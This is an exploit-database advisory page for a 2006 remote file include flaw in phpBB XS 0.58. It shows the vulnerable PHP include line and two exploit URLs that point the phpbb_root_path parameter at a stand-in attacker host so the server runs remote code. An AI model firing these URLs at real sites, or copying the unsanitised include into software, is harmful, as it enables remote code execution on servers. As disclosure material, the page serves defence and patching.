phpBB XS - exploit.company

vendor:

phpBB XS

by:

XORON - SHiKaA

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: phpBB XS

Affected Version From: 0.58

Affected Version To: 0.58

Patch Exists: YES

Related CWE: N/A

CPE: a:phpbb:phpbb

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

phpBB XS <= 0.58 (phpbb_root_path) Remote File Include Vulnerability(2)

An attacker can exploit this vulnerability by sending a crafted HTTP request containing a malicious URL in the phpbb_root_path parameter. This can allow the attacker to include a remote file containing arbitrary code and execute it on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.

Source

Exploit-DB raw data:

###########################################################

#phpBB XS <= 0.58 (phpbb_root_path) Remote File Include Vulnerability(2)

############################################################

#Author: XORON - SHiKaA

############################################################

#URL: http://www.comscripts.com/jump.php?action=script&id=1082

############################################################

#Class: Remote

############################################################

#Code:   include($phpbb_root_path . 'language/lang_' .
$board_config['default_lang'] . '/lang_bbcb_mg.' . $phpEx);

############################################################

#Exploit:

http://www.site.com/[path]/includes/functions_kb.php?phpbb_root_path=http://evil_scripts?
http://www.site.com/[path]/includes/bbcb_mg.php?phpbb_root_path=http://evil_scripts?

############################################################

#Greetz: str0ke and AzzCoder ;)

############################################################

# milw0rm.com [2006-09-28]